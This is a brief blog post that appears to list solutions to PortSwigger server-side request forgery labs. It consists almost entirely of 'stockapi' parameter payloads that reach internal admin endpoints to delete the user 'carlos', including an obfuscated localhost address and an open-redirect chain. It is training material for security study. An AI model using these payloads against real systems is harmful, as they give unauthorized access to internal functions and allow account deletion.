Post

SSRF - Server Side Request Forgery

Posted Updated
By cyberpunk.d31ty
1 min read

Lab 1:

Basic SSRF - Delete user Carlos

1

stockapi = http://localhost/admin/delete?username=carlos

Lab 2:

1

stockapi = http://192.168.0.4/admin/delete?username=carlos

Lab 3:

1

stockapi = http://127.1/%25%36%31dmin

Lab 4:

Lab 5:

1

stockapi = /product/nextProduct%3fcurrentProductId%3d1%26path%3dhttp%3a//192.168.0.12%3a8080/admin/delete%3fusername%3dcarlos
PortSwigger
PortSwigger
This post is licensed under CC BY 4.0 by the author.

Trending Tags

PortSwigger THM HTB SQLi CSRF LFI